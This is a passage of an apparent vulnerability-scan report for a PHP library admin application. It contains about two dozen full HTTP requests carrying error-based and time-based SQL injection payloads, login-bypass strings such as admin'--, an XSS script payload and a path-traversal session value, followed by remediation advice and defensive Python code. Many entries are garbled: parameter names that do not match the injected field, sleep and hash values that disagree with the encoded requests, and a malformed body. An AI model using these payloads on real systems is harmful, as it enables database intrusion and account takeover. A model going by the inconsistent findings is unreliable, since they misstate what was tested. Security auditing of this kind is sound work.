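        // session_start() takes the id from $_COOKIE; removing a malformed value
        // here means the files handler never tries to open a file named after it,
        // and a fresh id is issued instead.
        unset($_COOKIE[$name]);
    }
    session_start();
}

// The two ids that appear in this report: the scanner's traversal value is
// rejected, the 26-character id from the other requests is accepted.
assert(!isValidSessionId('../../../../public/858425652.php'));
assert(isValidSessionId('kddm4qe9fe20nacmu3lqm9uuss'));
```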
6. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: deadline
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1084451557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 4
Accept-Encoding: gzip
7. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: KeyWord
Payload: 5'and(select*from(select+sleep(2))a/**/union/**/select+1)='
Request1:
GET /?a=index&c=Book&keyword=5%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
8. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: name
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1172919984)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281172919984%29%29%29and%27&press=123456&pressTime=6-3&price=12
9. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: author
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1875407941)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281875407941%29%29%29and%27&desc=123456&name=123456&press=123456&pressTime=2001-6-4&price=12
10. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: press
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1173951946)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281173951946%29%29%29and%27&pressTime=2001-6-4&price=12
11. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: pressTime
Payload: /**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
12. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: State
Payload: 6-3'and/**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 187
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
13. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: Publication
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1173979346)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 185
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281173951946%29%29%29and%27&pressTime=&price=12
14. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: price
Payload: 12'and/**/extractvalue(1,concat(char(126),md5(1299868396)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=2001-64&price=12%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281299868396%29%29%29and%27
15. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: ISBN
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1123453171)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281123453171%29%29%29and%27&author=123456&desc=123456&name=123456&press=123456&pressTime=price=12
16. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: desc
Payload: 123456'and/**/extractvalue(1,concat(char(126),md5(1750467231)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 183
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281750467231%29%29%29and%27&name=123456&press=123456&pressTime=&price=12
17. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: price
Payload: 12'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=&price=12%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27
18. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: ISBM
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&author=123456&desc=123456&name=123456&press=123456&pressTime=&price=12
19. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=edit&id=1
ParamPosition: query
ParamKey: ID
Payload: extractvalue(1,concat(char(126),md5(1661479594)))
Request1:
GET /?a=edit&c=Book&id=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281661479594%29%29%29&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
20. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: desc
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&name=123456&press=123456&pressTime=&price=12
21. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: name
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&press=123456&pressTime=&price=12
22. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=edit&id=1
ParamPosition: query
ParamKey: identity
Payload: (select*from(select+sleep(5)union/**/select+1)a)
Request1:
GET /?a=edit&c=Book&id=%28select%2Afrom%28select%2Bsleep%280%29union%2F%2A%2A%2Fselect%2B1%29a%29&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
23. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: Publishing House
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&desc=123456&name=123456&press=123456&pressTime=&price=12
24. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition: body
ParamKey: Title
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&desc=123456&name=123456&press=123456&pressTime=&price=12
25. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: account
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1084451557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
26. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: Users
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1087653557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
27. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: keyword
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1084451557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
28. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:Renew
Payload: 6-3'and/**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 187
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
29. SQL injection vulnerability
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:class
Payload: 6-3'and/**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 187
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
SQL injection attacks found in the project and their solutions
1. Weak password vulnerability
Solution: use passwords of at least 6 characters combining digits, letters and special characters. The database must not store plaintext passwords; it should store only the encrypted form.
2. The backend can be entered by typing its URL directly, without logging in with a username and password.
Solution: configure an interceptor that filters out connection requests from invalid (unauthenticated) users.
3. Exceptions thrown in the responses of interfaces may expose program details. An experienced intruder can learn a great deal from a thrown exception: part of the program's architecture, its physical path on disk, the information revealed by SQL injection errors, and so on.
Solution: define a custom Exception that wraps the exception details so that they are never thrown out to the page.
4. SQL injection
Principle: SQL injection is an attack technique in which SQL code is placed in input parameters and passed to the server, where it is parsed and executed. The attacker constructs special input, mostly fragments of SQL syntax, and passes it in as a parameter; when the resulting SQL statement runs, it performs an action that was never intended. The main cause is that the program does not filter user-supplied data carefully enough, so illegal data enters the system.
4.1 String injection:
Consider a user login page with username and password fields and a submit button. The user enters a username and password and submits the form.
This is a POST request that calls the interface web/login.do. The backend first connects to the database and then checks the username and password carried in the POST parameters, which is the SQL query step. Suppose the correct username and password are admin and pwd12345678. Entering them and submitting is equivalent to executing the following SQL statement:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin' AND password = 'pwd12345678'
Because both username and password are strings, the injection technique is to make the data carried in a parameter turn the rest of the statement into a MySQL comment. MySQL has two comment syntaxes:
(1) '#': everything after '#' is treated as a comment. Enter admin'# as the username (the single quote closes the quote to the left of admin), enter any password, e.g. 111, and click submit. This is equivalent to the SQL statement:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'#' AND password = '111'
Everything after '#' is commented out, so this amounts to:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'
Enter admin' OR NAME LIKE 'a%'# as the username (the single quote closes the quote to the left of a%), enter any password, e.g. abcd, and click submit. This is equivalent to the SQL statement:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin' OR NAME LIKE 'a%'#' AND password=' abcd '
Everything after '#' is commented out, so this amounts to:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin' OR NAME LIKE 'a%'
(2) '-- ' (note the space after --): everything after '-- ' is treated as a comment. Enter admin'-- as the username (note the space after --; the single quote closes the quote to the left of admin), enter any password, e.g. 111, and click submit. This is equivalent to the SQL statement:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'-- ' AND password = '111'
Everything after '-- ' is commented out, so this amounts to:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'
Consequently, in cases like this a wrong password, or no password at all, is enough to log in to the 'admin' account, which is extremely dangerous.
By underlying technique, SQL injection divides into platform-layer injection and code-layer injection. The former results from insecure database configuration or vulnerabilities in the database platform; the latter mainly from programmers not filtering input carefully, so that illegal queries are executed. Accordingly, the causes of SQL injection usually fall into the following categories:
1) improper type handling;
2) insecure database configuration;
3) improper handling of result sets;
4) improper error handling;
5) improper handling of escape characters;
6) improper handling of multiple submissions.
Defences:
1) Strictly check the type and format of input variables. For integer parameters, require that the value is not empty and is numeric; for string parameters, filter with a regular expression, e.g. require a string made only of characters in the range [0-9a-zA-Z].
2) Never build SQL by dynamic string assembly; use parameterized SQL, or stored procedures, for data access.
3) Filter and escape special characters: escape the variable before use, escaping ', " and \ and similar characters.
4) Do not store confidential information as-is; encrypt or hash passwords and other sensitive data.
5) Application error messages should reveal as little as possible; preferably wrap the original error in a custom error message.
6) Use MySQL's prepared-statement (precompilation) mechanism: the SQL template, with placeholders in place of the variables, is sent to the MySQL server, which compiles it and, based on its analysis of the statement, optimizes the use of the relevant indexes. When the parameters are finally bound they are sent to the server and the statement executes directly. This saves query time and server resources (compile once, execute many times) and also prevents SQL injection. How does it prevent injection? When the bound parameters reach the MySQL server and are compiled in, that is, filled into their placeholders, the server applies escaping to them.
There are four main protective measures against SQL injection vulnerabilities:
(1) on the server side, check the validity of user-submitted data before building the SQL query from it;
(2) encapsulate the information submitted by the client;
(3) replace or remove sensitive characters/strings;
(4) suppress error messages.
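As an added example (not code from this report or from the project it audits), the login query of section 4.1 in its concatenated form beside the parameterized form from defences 2 and 6, plus the integer type check from defence 1. It is written in Python against an in-memory SQLite database standing in for MySQL; SQLite accepts the '-- ' comment used in the text but not '#', so only the '-- ' case is exercised.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the SYS_ADMIN table from the text."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE SYS_ADMIN (id INTEGER PRIMARY KEY, NAME TEXT, password TEXT)")
    conn.execute("INSERT INTO SYS_ADMIN (NAME, password) VALUES ('admin', 'pwd12345678')")
    conn.commit()
    return conn


def login_concat(conn, name, password):
    """Vulnerable form: the statement is assembled by string concatenation.
    The username admin'-- (with a trailing space) closes the quote and comments
    out the password check, exactly as the SELECT in section 4.1 shows."""
    sql = f"SELECT * FROM SYS_ADMIN WHERE NAME = '{name}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_param(conn, name, password):
    """Hardened form (defences 2 and 6): the template with placeholders is sent
    first and the values are bound separately, so ' and -- arrive as data, not syntax."""
    sql = "SELECT * FROM SYS_ADMIN WHERE NAME = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


INT_RE = re.compile(r"[0-9]+")


def parse_int_param(raw):
    """Defence 1 for integer parameters such as id: must be present and all digits.
    Returns the int, or None so the caller can reject the request."""
    if raw is None or INT_RE.fullmatch(raw) is None:
        return None
    return int(raw)


def fetch_admin_by_id(conn, raw_id):
    """Both defences together: type-check first, then bind the checked value."""
    admin_id = parse_int_param(raw_id)
    if admin_id is None:
        return None
    return conn.execute("SELECT NAME FROM SYS_ADMIN WHERE id = ?", (admin_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("concat, admin'-- :", login_concat(db, "admin'-- ", "111"))  # True: check bypassed
    print("param,  admin'-- :", login_param(db, "admin'-- ", "111"))   # False
```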
30. XSS vulnerability
URL: http://library/?p=Admin&c=Book&a=edit&id=1
ParamPosition:query
ParamKey:id
Payload: <ScRiPt>alert(1)</sCrIpT>
Request1:
GET /?a=edit&c=Book&id=%3CScRiPt%3Ejyissjtevr%3C%2FsCrIpT%3E&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
